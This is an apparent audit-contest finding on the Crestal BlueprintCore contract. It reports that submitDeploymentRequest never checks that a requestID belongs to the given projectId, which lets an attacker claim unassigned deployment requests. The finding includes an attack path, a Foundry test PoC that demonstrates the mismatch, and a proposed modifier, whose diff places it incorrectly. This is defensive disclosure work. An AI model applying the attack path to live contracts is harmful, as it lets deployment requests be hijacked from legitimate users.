Tart Paisley Cow

Medium

# Lack of Validation in `BlueprintCore:submitDeploymentRequest` Allows Arbitrary Request Assignments

### Summary

The missing validation in `BlueprintCore.submitDeploymentRequest` allows an attacker to assign any `requestID` to any valid `projectId`, leading to incorrect event emissions and misrepresentation of deployment status. This can be exploited to claim deployment requests without proper ownership validation.
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L602


### Root Cause

In `BlueprintCore.submitDeploymentRequest`, there is no check ensuring that the provided `projectId` and `requestID` belong to the same project. This omission allows an attacker to link a valid `projectId` with any `requestID`, even if they are unrelated.

### Internal Pre-conditions

 - The attacker must know valid `projectId` and `requestID` values
 - The attacker can call `submitDeploymentRequest` using any valid projectId and an **arbitrary** `requestID`
 - The system currently follows a First-Come, First-Served (FCFS) model


### External Pre-conditions

 - The system follows a First-Come-First-Serve (FCFS) approach for deployment request assignments.
- The blockchain network allows monitoring of on-chain events in real-time.

### Attack Path

 - The attacker monitors the blockchain for `RequestDeployment` events where deployWorkerAddr == address(0), indicating unassigned requests
 - The attacker calls `submitDeploymentRequest` using **any** known valid `projectId` and the intercepted requestID
 - The system incorrectly accepts the assignment and emits an AcceptDeployment event with **misleading data**
 https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L625
 
 - The attacker systematically claims multiple unassigned deployment requests, disrupting the system and overriding legitimate assignments

### Impact

- **The system emits misleading events, making it unreliable.**
 - All users are affected as valid deployment requests can be hijacked
 - The assignment mechanism is compromised, allowing unauthorized parties to take control of deployment requests.

### PoC

Here is a basic PoC where we create two projects and call submitDeploymentRequest with the ID of another. It also includes commented lines to test the mitigation.
```solidity
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "forge-std/Vm.sol";
import "forge-std/console2.sol";
import "forge-std/console.sol";
import {BlueprintV5} from "../src/BlueprintV5.sol";
import {BlueprintCore} from "../src/BlueprintCore.sol";
import {Blueprint} from "../src/Blueprint.sol";
import {stdError} from "forge-std/StdError.sol";
import {MockERC20} from "./MockERC20.sol";

contract BasicTest is Test {
    BlueprintV5 public blueprint;
    MockERC20 public mockToken;
    bytes32 public projectId;
    bytes32 public projectId2;
    address public workerAddress;
    address public dummyAddress;

    function setUp() public {
        blueprint = new BlueprintV5();
        blueprint.initialize(); // mimic upgradeable contract deploy behavior

        mockToken = new MockERC20();

        // set crestal wallet address
        blueprint.setFeeCollectionWalletAddress(address(0x7D8be0Dd8915E3511fFDDABDD631812be824f578));

        projectId = bytes32("project1");
        projectId2 = bytes32("project2");

        workerAddress = address(0x4d6585D89F889F29f77fd7Dd71864269BA1B31df);
        dummyAddress = address(0);
    }

    function generateSignature(bytes32 _projectId, string memory _base64Proposal, string memory _serverURL)
        internal
        view
        returns (bytes memory, address)
    {
        bytes32 digest = blueprint.getRequestDeploymentDigest(_projectId, _base64Proposal, _serverURL);
        uint256 signerPrivateKey = 0xA11CE;
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(signerPrivateKey, digest);
        return (abi.encodePacked(r, s, v), vm.addr(0xA11CE));
    }


    function test_projectIdAandRequestIDnotMatch() public{
        bool accepted;
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "http://example.com";
        (bytes memory signature, ) = generateSignature(projectId, base64Proposal, serverURL);
        blueprint.addPaymentAddress(address(mockToken));
        blueprint.setCreateAgentTokenCost(address(mockToken), 0);
        //emit BlueprintCore.CreateAgent(projectId, "fake", signerAddress, 0, 0);
        
        //create 2 projcts with dummy adresses
        bytes32 requestIDProject1 = blueprint.createAgentWithTokenWithSig(
            projectId, base64Proposal, dummyAddress, serverURL, address(mockToken), signature
        );
        bytes32 requestIDProject2 = blueprint.createAgentWithTokenWithSig(
            projectId2, base64Proposal, dummyAddress, serverURL, address(mockToken), signature
        );

        //here we have to expect revert
        //vm.expectRevert("RequestID does not belong to the project");
        accepted = blueprint.submitDeploymentRequest(projectId2, requestIDProject1);
        
        //here we have to expect ok
        /*
        (, address workerBefore) = blueprint.requestDeploymentStatus(requestIDProject1);
        console.log("Worker Before:", workerBefore);
        accepted = blueprint.submitDeploymentRequest(projectId, requestIDProject1);

        (, address workerAfter) = blueprint.requestDeploymentStatus(requestIDProject1);
        console.log("Worker Before:", workerAfter);
        */

        console.log("Deployment accepted: ",accepted);
    }

}

```

### Mitigation

Consider implementing a mapping to link project IDs with requests or, since the deployment list is an array, add the following modifier to `BlueprintCore` check if it actually belongs to the same project

```diff
+    modifier onlyValidRequest(bytes32 projectId, bytes32 requestID) {
+       bytes32 projectDeploymentId = projects[projectId].requestDeploymentID;
+        bytes32[] storage deploymentList = deploymentIdList[projectDeploymentId];

+        bool exists = false;
+       for (uint i = 0; i < deploymentList.length; i++) {
+            if (deploymentList[i] == requestID) {
+               exists = true;
+               break;
+           }
+        }
+        require(exists, "RequestID does not belong to the project");
+       _;
+    }
```

and add this validation to 

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L602

```diff
        function submitDeploymentRequest(bytes32 projectId, bytes32 requestID)
        public
        hasProject(projectId)
        returns (bool isAccepted)
+     onlyValidRequest
    {

```